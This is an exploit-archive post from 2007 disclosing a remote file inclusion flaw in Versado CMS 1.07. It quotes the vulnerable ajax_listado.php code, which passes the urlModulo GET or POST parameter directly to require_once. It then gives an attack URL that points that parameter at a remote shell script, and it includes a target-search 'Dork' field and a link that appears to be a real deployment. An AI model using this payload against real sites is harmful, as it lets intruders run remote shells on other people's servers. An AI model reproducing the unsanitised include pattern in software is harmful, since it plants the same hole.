Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability
# Published : 2007-05-04
# Author : kezzap66345
# Previous Title : E-GADS! 2.2.6 (common.php locale) Remote File Inclusion Vulnerability
# Next Title : workbench 0.11 (header.php path) Remote File Inclusion Vulnerability

##############################################################################################
##############################################################################################
#Versado CMS  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:includes/ajax_listado.php
#
# if(!empty($_GET['urlModulo'])){
       require_once($_GET['urlModulo']);
}else if(!empty($_POST['urlModulo'])){
       require_once($_POST['urlModulo']);


#BUG:
#
#Example:http://site.com/includes/ajax_listado.php?urlModulo=[[Sh3LL Script]]
#Script Download
#############################################################################
#http://sourceforge.net/project/downloading.php?group_id=149698&use_mirror=puzzle&filename=versado_CMS.rar&80698096
#
#Original W3b Site############################################################################
#
#http://www.versado.com.ar/control/index.php
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# www.Syue.com [2007-05-04]